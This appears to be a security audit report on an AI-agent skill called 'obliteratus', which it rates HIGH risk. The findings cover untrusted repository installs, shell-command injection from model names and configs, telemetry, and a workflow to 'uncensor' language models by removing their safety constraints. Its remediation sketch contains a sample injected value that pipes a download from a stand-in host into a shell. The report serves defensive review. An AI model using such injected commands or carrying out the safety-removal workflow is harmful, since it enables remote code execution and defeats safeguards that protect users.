obliteratus
Fail
Audited by Gen Agent Trust Hub on Apr 27, 2026
Risk Level: HIGH
Tags: EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill clones a software repository from an external, untrusted GitHub user (github.com/elder-plinius/OBLITERATUS.git).
- [REMOTE_CODE_EXECUTION]: The skill runs `pip install -e .` on the downloaded repository, allowing arbitrary installation logic from a third-party source to execute.
- [COMMAND_EXECUTION]: (Indirect prompt-injection surface) The skill ingests untrusted data from model names and configuration files (e.g., templates/abliteration-config.yaml) and interpolates it into shell commands. Boundary markers: no explicit boundaries or ignore-instructions are present. Capability inventory: uses subprocess for CLI commands and Python execution. Sanitization: no input validation logic is visible in the provided files.
- [DATA_EXFILTRATION]: The skill offers an opt-in `--contribute` telemetry flag that sends model performance data to an external researcher database.
- [PROMPT_INJECTION]: The instructions direct the agent to "abliterate" or "uncensor" models, providing a workflow for bypassing LLM safety constraints. No adversarial injections targeting the agent's own system prompt were detected.
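The COMMAND_EXECUTION finding above describes untrusted values (model names, config fields) being interpolated into shell commands. A minimal sketch of that injection surface, and of the standard mitigation, is below; the `model_name` value and the `echo` command are hypothetical stand-ins, not code from the audited skill:

```python
import shlex
import subprocess

# Hypothetical attacker-controlled input flowing in from a model name
# or a YAML config field, as the audit describes.
model_name = "llama-3; curl evil.example | sh"

# UNSAFE (the pattern flagged in the audit): with shell=True and string
# interpolation, the ';' splits the line into two shell commands.
#   subprocess.run(f"some-cli {model_name}", shell=True)

# SAFER: pass an argument list with shell=False (the default), so the
# untrusted value is a single argv element and shell metacharacters
# like ';' and '|' are never interpreted by a shell.
subprocess.run(["echo", model_name], check=True)

# If building a shell string is unavoidable, quote the value first.
quoted = shlex.quote(model_name)
print(quoted)  # the whole value is wrapped in single quotes
```

This is the mitigation the "Sanitization" note implies is missing: either avoid the shell entirely or quote every interpolated value.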
Recommendations
- AI analysis detected serious security threats in this skill; review the findings above before use.
Audit Metadata